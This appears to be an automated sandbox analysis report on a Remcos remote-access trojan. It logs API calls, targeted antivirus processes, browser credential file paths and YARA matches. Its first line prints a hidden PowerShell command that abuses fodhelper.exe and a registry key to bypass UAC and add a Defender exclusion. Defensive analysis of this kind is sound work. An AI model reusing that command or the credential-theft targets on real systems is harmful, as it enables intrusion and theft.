Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "			Jump to behavior

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DF272B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,

25_2_00007FF67DF272B0

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DEF4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,

25_2_00007FF67DEF4E98

Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\85q3
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\T3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000781000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrasystem.com:
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerN|
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\q3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr|
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\h3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager*|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: |Program Manager|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerZ3
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\]3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager%|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQD\\sppsvc.pif|
Source: sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Language, Device and Operating System Detection

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1BA24C52 cpuid

28_2_1BA24C52

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,		4_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,		4_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,		4_2_00007FF789BD3140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,		6_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,		6_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,		6_2_00007FF789BD3140
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,		25_2_00007FF67DF43800
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: CoInitialize,WinExec,EnumSystemLocalesA,		28_2_028ACE0C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesA,		28_2_028B3AD5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoA,		28_2_1B9FF8D1
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,		28_2_1BA4230A
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,		28_2_1BA42313
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,		28_2_1BA388ED
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,		28_2_1BA42036
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,		28_2_1BA41F9B
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,		28_2_1BA41F50
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		28_2_1BA42610
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,		28_2_1BA42543
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		28_2_1BA41CD8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		28_2_1BA4243C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,		28_2_1BA38404
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,		29_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,		29_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,		29_2_00007FF789BD3140
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,		36_2_029A5A3C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,		36_2_029BCE0C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,		36_2_029BCE0C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoA,		36_2_029AA6F8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoA,		36_2_029AA744
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,		36_2_029C3AD6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,		36_2_029A5B48
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: EnumSystemLocalesW,		36_2_210B2036
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		36_2_210B20C3
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoW,		36_2_210B2313
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoW,		36_2_210B2543
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: EnumSystemLocalesW,		36_2_210A8404
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		36_2_210B243C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		36_2_210B2610
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoA,		36_2_2106F8D1
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: GetLocaleInfoW,		36_2_210A88ED
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		36_2_210B1CD8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: EnumSystemLocalesW,		36_2_210B1F50
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: EnumSystemLocalesW,		36_2_210B1F9B

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BC6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,

4_2_00007FF789BC6EE4

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DE98018 GetUserNameExW,GetLastError,#357,wcschr,TranslateNameW,GetLastError,#359,#145,GetLastError,#73,#357,#208,#36,#26,GetLastError,#140,#357,LocalFree,#41,#224,#13,

25_2_00007FF67DE98018

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1BA39365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

28_2_1BA39365

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BC586C GetVersion,

4_2_00007FF789BC586C

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

36_2_2106BA12

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: \key3.db		36_2_2106BB30

Remote Access Functionality

Source: C:\Users\Public\Libraries\sppsvc.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: cmd.exe

36_2_2106569A

Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,		25_2_00007FF67DE75648
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,		25_2_00007FF67DE554A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,		25_2_00007FF67DE6E568
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,		25_2_00007FF67DE5227C